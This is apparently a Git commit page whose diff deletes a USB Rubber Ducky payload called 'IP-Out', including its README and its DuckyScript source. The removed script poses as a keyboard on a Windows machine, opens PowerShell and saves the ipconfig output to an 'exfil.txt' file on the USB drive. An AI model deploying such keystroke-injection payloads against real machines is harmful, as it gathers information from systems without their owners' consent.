Delete payloads/library/credentials/IP-Out directory
Mavis Coffey
GitHub
parent
63e0c18618
commit
8be0f9a092
|
|
@ -1,12 +0,0 @@
|
||||||
# IP-OUT
|
|
||||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Useful Tips
|
|
||||||
|
|
||||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
|
||||||
|
|
||||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
||||||
|
|
@ -1,64 +0,0 @@
|
||||||
REM Title: IP-Out
|
|
||||||
REM Author: Mavisinator30001
|
|
||||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
|
||||||
REM Target: Any Windows System
|
|
||||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
|
||||||
DEFINE #DRIVELABEL D
|
|
||||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
|
||||||
REM VERSION 1.1
|
|
||||||
REM AUTHOR: Korben
|
|
||||||
|
|
||||||
REM_BLOCK DOCUMENTATION
|
|
||||||
Windows fully passive OS Detection and passive Detect Ready
|
|
||||||
Includes its own passive detect ready.
|
|
||||||
Does not require additional extensions.
|
|
||||||
|
|
||||||
USAGE:
|
|
||||||
Extension runs inline (here)
|
|
||||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
|
||||||
boot delay
|
|
||||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
|
||||||
See end of payload for usage within payload
|
|
||||||
END_REM
|
|
||||||
|
|
||||||
REM CONFIGURATION:
|
|
||||||
DEFINE #MAX_WAIT 150
|
|
||||||
DEFINE #CHECK_INTERVAL 20
|
|
||||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
|
||||||
DEFINE #NOT_WINDOWS 7
|
|
||||||
|
|
||||||
$_OS = #NOT_WINDOWS
|
|
||||||
|
|
||||||
VAR $MAX_TRIES = #MAX_WAIT
|
|
||||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
|
||||||
DELAY #CHECK_INTERVAL
|
|
||||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
|
||||||
END_WHILE
|
|
||||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
|
||||||
$_OS = WINDOWS
|
|
||||||
END_IF
|
|
||||||
|
|
||||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
|
||||||
IF ($_OS == WINDOWS) THEN
|
|
||||||
STRING HELLO WINDOWS!
|
|
||||||
ELSE
|
|
||||||
STRING HELLO WORLD!
|
|
||||||
END_IF
|
|
||||||
END_REM
|
|
||||||
END_EXTENSION
|
|
||||||
IF $_OS != WINDOWS
|
|
||||||
STOP_PAYLOAD
|
|
||||||
END_IF
|
|
||||||
ATTACKMODE HID STORAGE
|
|
||||||
DELAY 500
|
|
||||||
GUI r
|
|
||||||
DELAY 300
|
|
||||||
STRINGLN Powershell
|
|
||||||
DELAY 1000
|
|
||||||
DEFINE #DRIVELABEL DUCKY
|
|
||||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
|
||||||
WAIT_FOR_STORAGE_ACTIVITY
|
|
||||||
WAIT_FOR_STORAGE_INACTIVITY
|
|
||||||
ALT F4
|
|
||||||
ATTACKMODE OFF
|
|
||||||
HIDE_PAYLOAD
|
|
||||||
Loading…
Reference in New Issue